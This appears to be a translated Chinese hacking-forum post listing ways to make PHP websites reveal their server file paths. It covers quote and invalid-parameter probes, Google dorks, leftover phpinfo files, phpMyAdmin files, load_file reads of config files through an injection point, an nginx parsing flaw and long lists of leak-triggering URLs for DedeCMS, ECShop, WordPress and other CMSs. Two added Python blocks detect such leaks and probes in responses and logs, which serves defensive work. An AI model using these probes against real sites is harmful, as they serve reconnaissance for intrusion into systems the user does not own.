From: http://www.cnhonkerarmy.com/thread-139414-1-1.html
1. Single-quote path disclosure
Description
Append a single quotation mark directly to the end of the URL. This requires that the single quotation mark is not filtered (Gpc=off) and that the server returns error messages by default.
www.xxxxx.com/news.php?id=149'
2. Path disclosure via an invalid parameter value
Description
Change the value of the parameter you submit to an invalid value, such as -1 or -99999. This is worth trying when single quotes are filtered.
www.xxxxx.com/researcharchive.php?id=-1
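Both techniques above depend on PHP error text reaching the response. The following check for that text is meant for running against your own application's responses; it is an added example, not part of the original post, and the sample responses and the names find_path_leaks and audit are constructed for illustration:

```python
import re

# Shape of a PHP error line, with or without html_errors markup:
#   Warning: <message> in /var/www/html/news.php on line 27
#   <b>Fatal error</b>:  <message> in <b>D:/wwwroot/x.php</b> on line <b>3</b>
PHP_ERROR = re.compile(
    r"(?P<level>Warning|Fatal error|Parse error|Notice|Deprecated)(?:</b>)?:\s+"
    r"(?P<message>[^\r\n]*)\s+in\s+(?:<b>)?"
    r"(?P<path>(?:[A-Za-z]:[\\/]|/)[^<>\r\n]+?)(?:</b>)?"
    r"\s+on\s+line\s+(?:<b>)?(?P<line>\d+)"
)


def find_path_leaks(body):
    """Return one dict per PHP error in body that exposes an absolute path."""
    return [
        {"level": m["level"], "path": m["path"], "line": int(m["line"])}
        for m in PHP_ERROR.finditer(body)
    ]


def audit(responses):
    """Map each URL to its leaks; URLs with a clean body are left out."""
    report = {}
    for url, body in responses.items():
        leaks = find_path_leaks(body)
        if leaks:
            report[url] = leaks
    return report


# Constructed sample responses (not captured from any real site).
SAMPLES = {
    "/news.php?id=149'": (
        "<html>\nWarning: mysql_fetch_array() expects parameter 1 to be "
        "resource, boolean given in /var/www/html/news.php on line 27\n</html>"
    ),
    "/temp/compiled/index.dwt.php": (
        "<br />\n<b>Fatal error</b>:  Call to undefined function foo() in "
        "<b>D:\\wwwroot\\shop\\index.dwt.php</b> on line <b>3</b><br />"
    ),
    "/news.php?id=150": "<html><p>Article 150</p></html>",
}

if __name__ == "__main__":
    for url, leaks in audit(SAMPLES).items():
        print(url, leaks)
```

With display_errors = Off and log_errors = On in php.ini, the same errors go to the server log instead of the response and the audit comes back empty.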
3. Path disclosure via Google
Description
Combine keywords with the site: syntax to search for cached snapshots of error pages; common keywords are warning and fatal error. Note that if the target site is on a second-level domain name, point site: at its corresponding top-level domain, which returns much more information.
site:xxx.edu.tw warning
site:xxx.com.tw "fatal error"
4. Path disclosure via test files
Description
Many web sites have test files left in their root directory, and the script code in them is usually phpinfo().
www.xxxxx.com/test.php
www.xxxxx.com/ceshi.php
www.xxxxx.com/info.php
www.xxxxx.com/phpinfo.php
www.xxxxx.com/php_info.php
www.xxxxx.com/1.php
5. Path disclosure via phpMyAdmin
Description
Once you find the phpMyAdmin administration page, accessing certain files in its directory is likely to disclose the physical path. The phpMyAdmin address can be found by sweeping with a tool such as wwwscan, or with Google. PS: some BT websites write it as phpMyAdmin.
1. /phpmyadmin/libraries/lect_lang.lib.php
2. /phpmyadmin/index.php?lang[]=1
3. /phpmyadmin/phpinfo.php
4. load_file()
5. /phpmyadmin/themes/darkblue_orange/layout.inc.php
6. /phpmyadmin/libraries/select_lang.lib.php
7. /phpmyadmin/libraries/lect_lang.lib.php
8. /phpmyadmin/libraries/mcrypt.lib.php
6. Finding the path from configuration files
Description
If the injection point has file read permission, you can read the configuration file manually with load_file or with a tool, and then find the path information (generally at the end of the file). The default paths of the Web server and PHP configuration files on each platform can be found online; several common ones are listed here.
Windows:
C:\windows\php.ini PHP configuration file
C:\windows\system32\inetsrv\MetaBase.xml IIS Virtual Host configuration file
Linux:
/etc/php.ini PHP configuration file
/etc/httpd/conf.d/php.conf
/etc/httpd/conf/httpd.conf Apache configuration file
/usr/local/apache/conf/httpd.conf
/usr/local/apache2/conf/httpd.conf
/usr/local/apache/conf/extra/httpd-vhosts.conf Virtual Directory configuration file
7. Path disclosure via the Nginx file type parsing error
Description
This was discovered by accident yesterday. It requires the Web server to be nginx with the file type parsing vulnerability present. Sometimes, when /x.php is appended to an image address, the image is not only executed as a PHP file but may also disclose the physical path.
/x.php
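Several of the requests described above have a recognisable shape in an access log. The following detection pass over combined-format log lines covers the probes from sections 1, 5 and 7; it is an added example, not part of the original post, and the log lines, labels and function names are constructed for illustration:

```python
import re
from urllib.parse import unquote

# Client, request target and status from a combined-format access log line.
LOG_LINE = re.compile(
    r'^(?P<client>\S+) .*?"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+" '
    r"(?P<status>\d{3})"
)
# Section 7: a static file name used as a directory, then a .php segment.
STATIC_THEN_PHP = re.compile(r"\.(?:jpe?g|png|gif|bmp|ico)/[^/]*\.php$", re.I)
# Section 5: a parameter sent as an array, e.g. lang[]=1.
ARRAY_PARAM = re.compile(r"(?:^|&)[^=&]+\[\]=")


def classify(target):
    """Return the probe labels that apply to one request target."""
    path, _, query = target.partition("?")
    path, query = unquote(path), unquote(query)
    labels = []
    if STATIC_THEN_PHP.search(path):
        labels.append("static-file-as-php")
    if ARRAY_PARAM.search(query):
        labels.append("array-parameter")
    if query.endswith("'"):  # section 1: quote appended to the URL
        labels.append("trailing-quote")
    return labels


def scan(lines):
    """Return (client, status, target, labels) for each suspicious line."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if m and (labels := classify(m["target"])):
            hits.append((m["client"], int(m["status"]), m["target"], labels))
    return hits


# Constructed log lines using documentation-range addresses.
STAMP = "- - [01/Mar/2024:10:00:00 +0000]"
SAMPLE_LOG = [
    f'203.0.113.7 {STAMP} "GET /upload/logo.gif/x.php HTTP/1.1" 200 512',
    f'203.0.113.7 {STAMP} "GET /phpmyadmin/index.php?lang[]=1 HTTP/1.1" 200 900',
    f'203.0.113.7 {STAMP} "GET /news.php?id=149%27 HTTP/1.1" 200 700',
    f'198.51.100.4 {STAMP} "GET /images/logo.gif HTTP/1.1" 200 3100',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

The array-parameter label fires on any name[]= request, so apply it only to endpoints that expect scalar parameters. A 200 status on a static-file-as-php hit means the request was served rather than rejected and deserves the closest look.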
8. Other
Dedecms
/member/templets/menulit.php
plus/paycenter/alipay/return_url.php
plus/paycenter/cbpayment/autoreceive.php
paycenter/nps/config_pay_nps.php
plus/task/dede-maketimehtml.php
plus/task/dede-optimize-table.php
plus/task/dede-upcache.php
Wp
wp-admin/includes/file.php
wp-content/themes/baiaogu-seo/footer.php
ECShop mall system path disclosure files
/api/cron.php
/wap/goods.php
/temp/compiled/ur_here.lbi.php
/temp/compiled/pages.lbi.php
/temp/compiled/user_transaction.dwt.php
/temp/compiled/history.lbi.php
/temp/compiled/page_footer.lbi.php
/temp/compiled/goods.dwt.php
/temp/compiled/user_clips.dwt.php
/temp/compiled/goods_article.lbi.php
/temp/compiled/comments_list.lbi.php
/temp/compiled/recommend_promotion.lbi.php
/temp/compiled/search.dwt.php
/temp/compiled/category_tree.lbi.php
/temp/compiled/user_passport.dwt.php
/temp/compiled/promotion_info.lbi.php
/temp/compiled/user_menu.lbi.php
/temp/compiled/message.dwt.php
/temp/compiled/admin/pagefooter.htm.php
/temp/compiled/admin/page.htm.php
/temp/compiled/admin/start.htm.php
/temp/compiled/admin/goods_search.htm.php
/temp/compiled/admin/index.htm.php
/temp/compiled/admin/order_list.htm.php
/temp/compiled/admin/menu.htm.php
/temp/compiled/admin/login.htm.php
/temp/compiled/admin/message.htm.php
/temp/compiled/admin/goods_list.htm.php
/temp/compiled/admin/pageheader.htm.php
/temp/compiled/admin/top.htm.php
/temp/compiled/top10.lbi.php
/temp/compiled/member_info.lbi.php
/temp/compiled/bought_goods.lbi.php
/temp/compiled/goods_related.lbi.php
/temp/compiled/page_header.lbi.php
/temp/compiled/goods_script.html.php
/temp/compiled/index.dwt.php
/temp/compiled/goods_fittings.lbi.php
/temp/compiled/myship.dwt.php
/temp/compiled/brands.lbi.php
/temp/compiled/help.lbi.php
/temp/compiled/goods_gallery.lbi.php
/temp/compiled/comments.lbi.php
/temp/compiled/myship.lbi.php
/includes/fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php
/includes/modules/cron/auto_manage.php
/includes/modules/cron/ipdel.php
UCenter path disclosure
ucenter\control\admin\db.php
Dzbbs
Manyou/admincp.php?my_suffix=%0a%0dtoby57
Z-blog
admin/fckeditor/editor/dialog/fck%5fspellerpages/spellerpages/server%2dscripts/spellchecker.php
php168 path disclosure
Admin/inc/hack/count.php?job=list
Admin/inc/hack/search.php?job=getcode
Admin/inc/ajax/bencandy.php?job=do
Cache/mysqltime.txt
Phpcms2008-sp4
Access as a registered user after logging in
Phpcms/corpandresize/process.php?pic=../images/logo.gif
Bo-blog
Poc:
/go.php/<[evil Code]
CmsEasy web site path disclosure vulnerability
The vulnerability appears in the menu_top.php file.
lib/mods/celive/menu_top.php
/lib/default/ballot_act.php
lib/default/special_act.php
Wordpress:
wp-includes/registration-functions.php